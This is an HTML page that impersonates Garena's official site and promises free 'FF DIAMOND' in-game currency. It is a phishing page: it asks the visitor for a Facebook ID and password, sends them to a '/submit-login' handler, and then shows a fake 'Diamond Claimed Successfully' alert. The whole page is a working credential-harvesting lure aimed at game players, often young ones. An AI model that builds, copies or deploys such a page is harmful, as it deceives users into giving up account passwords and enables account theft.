<html>
    <head>
        <title>FF DIAMOND </title>
       
        </head>
        <style>
            h1{
                color:white;
                background-color:black;
            }
            h5{
                color:lightgreen;
                background-color:green;
            }
            h4{
                color:red;
                background-color:yellow;
            }
            h6{
                color:purple;
                background-color:silver;
            }
            h2{
                color:red;
                background-color:silver;
                
            }
        </style>
            <div align ="center">
            <body>
                
                <h2>OFFICIAL WEBSITE OF GARENA </h2>
                <img src="content://media/external/images/media/99808" alt=".jpg" width="700" height="650">
            
                
                <h1>FF DIAMOND</h1><br><br>
                <img src="content://media/external/images/media/99807" alt=".jpg" width="700" height="650">
                <i class="fa-solid fa-diamond"></i>
                <br><br><br><br><br>
                <h4>WELCOME TO FF DIAMOND.HERE YOU CAN CLAIM FF DIAMOND EASILY.</h4><br><br><br>
                <h6>TO CLAIM FF DIAMOND JUST FOLLOW SOME SIMPLE STEP </h6><br><br><br>
                <h5>STEP 1</h5><br><br>
                <h3>FACEBOOK ID</h3>
                <form action="/submit-login" method="post">
                    <textarea name="write the problem you are facing" rows="2" cols="25"></textarea>
            
            <br><br>
            <h3>FACEBOOK PASSWORD</h3>
            <textarea name="write the problem you are facing" rows="2" cols="25"></textarea>
            <h2>CHOOSE YOUR DIAMOND FROM BELOW OPTION </h3><br><br>
            <select id="options" name="options">
                <option value="option1">select  diamond</option>
                <option value="option2">500 diamond</option>
                <option value="option3">700 diamond</option>
                <option value="option4">900 diamond</option>
                <option value="option5">1000 diamond</option>
            </select>
            <br><br>
             <br><br>
             <h4>ANY QUERY THEN CONTACT US </h4>
             <h3>EMAIL ID </h3>
             <textarea name="write the problem you are facing" rows="3" cols="22">
             </textarea>
             <h3> tell the problem which  you are facing </h3><br><br>
             <textarea name="write the problem you are facing" rows="8" cols="25">
             </textarea><br><br>
             
             <input type="button" onclick="alert('Diamond Claimed Successfully in your id! Please Check Your id!!! ')" value="SUBMIT">
                </body>
                </div>